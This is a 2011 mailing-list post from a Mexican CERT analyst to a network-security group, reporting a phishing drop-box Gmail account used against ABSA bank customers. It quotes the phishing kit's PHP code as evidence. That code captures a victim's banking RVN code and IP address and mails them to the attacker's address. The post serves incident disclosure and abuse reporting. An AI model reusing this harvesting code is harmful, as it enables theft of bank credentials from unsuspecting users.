[nsp-sec] Gmail phishing drop-box (Absa)
David Jiménez
ddavinci at gmail.com
Fri Jul 15 15:57:20 EDT 2011
Hi folks
The account progressing2mail at gmail.com was found in a phishing case against
ABSA (ZA) in Mexico.
Evidence
///////////////////////////
<?php
$err_define = 'RVN required';
if(isset($_POST['button_processRvn']))
{
if(trim($_POST['RVN']) == "")
{
$err_define = '- Please enter your RVN';
}
else if(strlen($_POST['RVN']) > 8)
{
$err_define = '- Invalid RVN';
}
else if(strlen($_POST['RVN']) < 8)
{
$err_define = '- RVN is invalid';
}
else {
$adddate=date("D M d, Y g:i a");
$ip = getenv("REMOTE_ADDR");
$message .= "-------------------------------\n";
$message .= "RVN: ".$_POST['RVN']."\n";
$message .= "----------------------------\n";
$message .= "IP: ".$ip."\n";
$recipient = "progressing2mail at gmail.com";
$subject = "RVN " .$ip;
$headers = "From";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
//mail("$to", "$subject", $message);
if(mail($recipient,$subject,$message,$headers)){
header("Location: tvn.php");
}
}
}
?>
Kind Regards
--
---
David Jimenez | CERT-MX Operations Center
--------------------------------------------------------------
Mexican National CSIRT
Federal Police / E-Crime Unit
Email: cert-mx at ssp.gob.mx
Phishing Report: phishing at ssp.gob.mx
PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188
More information about the nsp-security
mailing list